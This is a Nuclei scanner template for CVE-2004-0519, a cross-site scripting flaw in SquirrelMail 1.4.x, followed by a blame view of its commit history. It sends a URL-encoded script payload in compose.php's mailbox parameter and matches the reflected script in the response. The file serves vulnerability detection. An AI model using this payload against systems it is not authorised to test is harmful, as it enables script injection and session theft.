nuclei-templates/cves/2004/CVE-2004-0519.yaml

id: CVE-2004-0519

info:
  name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
  author: dhiyaneshDk
  severity: medium
  description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php."
  reference: https://www.exploit-db.com/exploits/24068
  tags: xss,squirrelmail,cve2004,cve

requests:
  - method: GET
    path:
      - '{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - "text/html"
Create CVE-2004-0519.yaml 2021-11-15 18:14:18 +00:00			`id: CVE-2004-0519`

			`info:`
			`name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting`
			`author: dhiyaneshDk`
			`severity: medium`
Auto Generated CVE annotations [Mon Nov 15 18:16:11 UTC 2021] :robot: 2021-11-15 18:16:11 +00:00			`description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php."`
Update CVE-2004-0519.yaml 2021-11-16 10:13:03 +00:00			`reference: https://www.exploit-db.com/exploits/24068`
			`tags: xss,squirrelmail,cve2004,cve`
Create CVE-2004-0519.yaml 2021-11-15 18:14:18 +00:00
			`requests:`
			`- method: GET`
			`path:`
Update CVE-2004-0519.yaml 2021-11-16 10:13:03 +00:00			`- '{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'`

Create CVE-2004-0519.yaml 2021-11-15 18:14:18 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`

			`- type: word`
			`part: body`
Update CVE-2004-0519.yaml 2021-11-16 10:13:03 +00:00			`words:`
			`- "</script><script>alert(document.domain)</script>"`
Create CVE-2004-0519.yaml 2021-11-15 18:14:18 +00:00
			`- type: word`
Update CVE-2004-0519.yaml 2021-11-16 10:13:03 +00:00			`part: header`
Create CVE-2004-0519.yaml 2021-11-15 18:14:18 +00:00			`words:`
			`- "text/html"`